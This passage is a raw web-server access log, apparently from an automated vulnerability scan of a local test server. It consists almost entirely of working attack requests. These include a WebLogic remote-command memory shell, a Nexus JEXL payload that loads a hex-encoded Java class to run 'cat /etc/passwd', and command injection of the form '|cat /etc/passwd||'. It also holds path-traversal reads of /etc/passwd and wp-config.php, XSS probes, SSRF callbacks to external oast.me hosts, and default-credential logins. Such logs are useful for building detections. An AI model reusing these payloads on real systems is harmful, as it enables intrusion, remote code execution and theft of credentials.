field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v0.1/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://ca27l3osmpvb3nig07h0in4r58u7j36pg.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=ca27l3osmpvb3nig07h04s3pyyzk9n4fb.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/config.exp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /loginLess/../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"{\x22action\x22: \x22coreui_Component\x22, \x22type\x22: \x22rpc\x22, \x22tid\x22: 8, \x22data\x22: [{\x22sort\x22: [{\x22direction\x22: \x22ASC\x22, \x22property\x22: \x22name\x22}], \x22start\x22: 0, \x22filter\x22: [{\x22property\x22: \x22repositoryName\x22, \x22value\x22: \x22*\x22}, {\x22property\x22: \x22expression\x22, \x22value\x22: \x22function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \x5CndefineClass.setAccessible(true);\x5Cnx=defineClass.invoke(\x5Cn y,\x5Cn 'Exploit.Test234',\x5Cn z.getBytes('latin1'), 0,\x5Cn 3054\x5Cn);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\x5Cn\x22}, {\x22property\x22: \x22type\x22, \x22value\x22: \x22jexl\x22}], \x22limit\x22: 50, \x22page\x22: 1}], \x22method\x22: \x22previewAssets\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/extdirect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=ca27l3osmpvb3nig07h0x9euyokksdkgc.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=smartcode HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 